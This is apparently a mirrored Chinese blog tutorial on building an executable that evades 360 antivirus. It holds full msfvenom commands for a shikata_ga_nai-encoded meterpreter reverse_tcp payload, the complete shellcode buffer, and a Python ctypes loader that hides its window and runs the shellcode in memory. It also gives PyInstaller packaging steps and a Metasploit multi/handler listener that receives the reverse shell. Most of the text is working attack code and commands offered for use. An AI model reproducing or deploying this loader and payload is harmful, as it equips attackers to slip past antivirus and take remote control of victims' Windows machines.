zoukankan      html  css  js  c++  java

  • Metasploit+python生成免杀exe过360杀毒

    Metasploit+python生成免杀exe360杀毒

    1在kali下生成一个反弹的msf的python脚本,命令如下:

    msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102  -e x86/shikata_ga_nai -i 11 -f py -o  /opt/bk.py

    2.拷贝出bk.py到window32系统进行修改,修改如下(这里的红色标注是修改增加的代码,其他不变)

    from ctypes import *

import ctypes

buf =  ""

buf += "xbbx7ax62x0ax22xdbxc9xd9x74x24xf4x58x29"

buf += "xc9xb1x97x31x58x15x03x58x15x83xe8xfcxe2"

buf += "x8fxdcx50xbcx22x5dxbfx0cx65xe9x1bx79xcd"

buf += "x39xadx30x7cx0cx5dx21xfdx87x61x46x2bxc8"

buf += "x35xc0x38x81xbfxd5xb9xd7x14x0cxcbx00x79"

buf += "x12x5dxd0xb1xeexfex06x1dx51x8ax92x29xd2"

buf += "xa4x4cxd0x08x22xdcx4fx24xb2x2bx2bxdax00"

buf += "x5fxa3x1dx01xfexe9xf2x62xebxa7x46x63xce"

buf += "xacx45xe4x8bxa1xa3x85x14xe1x1ex06xa7x6e"

buf += "x7ax03xe7x05xd2x41x32x24x3cx48x72xf2x57"

buf += "x0fx58x58x5cxf6xd5x0fx5bx6bxcax34xddx5d"

buf += "xe0x62x5axc2xdex3dxdcxb3xf0x3ex78x31x90"

buf += "x6cx5fx58xeex84xb0x30x87x60xecx58x25xad"

buf += "x4ax6bxc6xb7xd8x70xb8x2fxc8xd9xcfxecx10"

buf += "xcbx67x90xf2xdfxf2x4axf3x23xf6xd1x12xa5"

buf += "xfbx10xa9x56x4exd0xdcx10x21x1dxb5x58x17"

buf += "xe1x6dx69x74xc7xacx58x1axc9xf7x00xf8x54"

buf += "x76x05x6dxd4x9ex9cx22xdbx0fxa9xfaxe3x8b"

buf += "x8ex1ax1fx60xdbxbexefx2fx73xa5x42x02x93"

buf += "x89x0fx42xfaxaexb9x9bxecxe2x53x56x38x51"

buf += "x45x6fxb8xd2xffx3ax73x44xe4x38x38xf2x28"

buf += "x76xf0xcax34x80x35x55x83xadx29x23x8axca"

buf += "x07xcfx88x30x15x2exc0x99x1exddxb6xbbx49"

buf += "x92x1ex9axddxcfx58xe9x84x66x3dx38xfcx28"

buf += "x99xa4x19x09xe6x1cxf5xadx4fxa1x81xbfx51"

buf += "x3dx0bx9ex27x60x20x7dx59x6ex82x7cx25x5c"

buf += "x4ex34x25xedxc3xb1x45x02x92x75xf5x11xa5"

buf += "x54xdcx1bx6fx9bx56xd2xb5x80x66xcfxe1x61"

buf += "xd1x01xe4x31x52xd9x5bx01x37x29xa8xefxc8"

buf += "x53x9bx1cx47x30x9exe4x6axdaxb3xd5xfdxf5"

buf += "xb8x13xbcx92xbbxb4x82x70x02xadxefx3bx70"

buf += "xf4x98x84x31x52x97x60x2bx2ex84x9bx7fxb7"

buf += "x30x85x58xefx8cx95xa0x56x2fxefx20x61x0d"

buf += "x94x66xbfxa7xd0x71x56x52x82xb1xa0x19xe4"

buf += "x7exd9x90x96x2bx16xeax4cxdexcdx05x23x6e"

buf += "xc2x4bxc0x68x1bxbaxc1x1dxcax26x74xd1x92"

buf += "x4exd3x70x8ax43x41xbex59xf1x20x33x89xb9"

buf += "x2bxdbx9ax0fxadx8dx80x4cx78x52xe7x0axf7"

buf += "x47xd8x5cx0cx3cxd4x0dx3dxe7xbdx2dx22xb1"

buf += "x37x0axd9x5exf2xd5xd2x56xe0x56x1cx42xc3"

buf += "x75x92x55x7cx86x6axb4xcdx3axcex4dxeax4f"

buf += "xa4x31xc6xe0x16x27xa5xf4x9dx79x5exfcx60"

buf += "xebxefx35x33x6ex5bx6dxecx8fx9bx1exb1xf6"

buf += "x35xebx1fx3bxabx99x9ax34x2axf8x25x38xba"

buf += "x40xe9xb0x51xbcxdfx60x16x62xc3x63x64xbd"

buf += "xb5x28xf6x4cx71xd2x01x74x11xf0xd7xcdx4f"

buf += "x34xadxc2x65x4cxebx78xc1xbfxbax80x6cx46"

buf += "x6ax15x15x03x5ex8dx65x8ex69x89x29x7fx67"

buf += "xeaxc1x6bx62xb0xd4"

 

#libc = CDLL('libc.so.6')

PROT_READ = 1

PROT_WRITE = 2

PROT_EXEC = 4

def executable_code(buffer):

    buf = c_char_p(buffer)

    size = len(buffer)

    addr = libc.valloc(size)

    addr = c_void_p(addr)

    if 0 == addr: 

        raise Exception("Failed to allocate memory")

    memmove(addr, buf, size)

    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):

        raise Exception("Failed to set protection on buffer")

    return addr

VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc

VirtualProtect = ctypes.windll.kernel32.VirtualProtect

shellcode = bytearray(buf)

whnd = ctypes.windll.kernel32.GetConsoleWindow()   

if whnd != 0:

       if 666==666:

              ctypes.windll.user32.ShowWindow(whnd, 0)   

              ctypes.windll.kernel32.CloseHandle(whnd)

print ".................................."*666

memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

                                          ctypes.c_int(len(shellcode)),

                                          ctypes.c_int(0x3000),

                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

old = ctypes.c_long(1)

VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),

                                     buf,

                                     ctypes.c_int(len(shellcode)))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

print "Code By Luan"

shell()

    3.在windowsx86上安装支持python的环境,下载pywin32 解压运行,一直点下一步就可以了

    4.然后下载支持将python生成exe的软件pyinstall ,解压然后执行以下命令:

    D:mianshapyinstaller-2.0>python PyInstaller.py --console --onefile  bk.py

    注意这里不要有中文路径,否则会出错

    5.执行命令后会在d:pyinstaller-2.0kdist目录生成bk.exe

     

    6.这里我将在windowsx86上安装最新的360杀毒软件,进行查杀测试

     

    7.然后在kali下启动msf,然后执行以下命令:

    use exploit/multi/handler

set lhost 192.168.1.102

set lport 443

set PAYLOAD windows/meterpreter/reverse_tcp

exploit

    8.然后在windowsx86系统上执行bk.exe,最终在msf反弹出meterprer 出来:
  • 相关阅读:
    mysql修改数据表名
    HDU 5742 It's All In The Mind (贪心)
    HDU 5752 Sqrt Bo (数论)
    HDU 5753 Permutation Bo (推导 or 打表找规律)
    HDU 5762 Teacher Bo (暴力)
    HDU 5754 Life Winner Bo (博弈)
    CodeForces 455C Civilization (并查集+树的直径)
    CodeForces 455B A Lot of Games (博弈论)
    CodeForces 455A Boredom (DP)
    HDU 4861 Couple doubi (数论 or 打表找规律)
  • 原文地址:https://www.cnblogs.com/backlion/p/6785870.html
Copyright © 2011-2022 走看看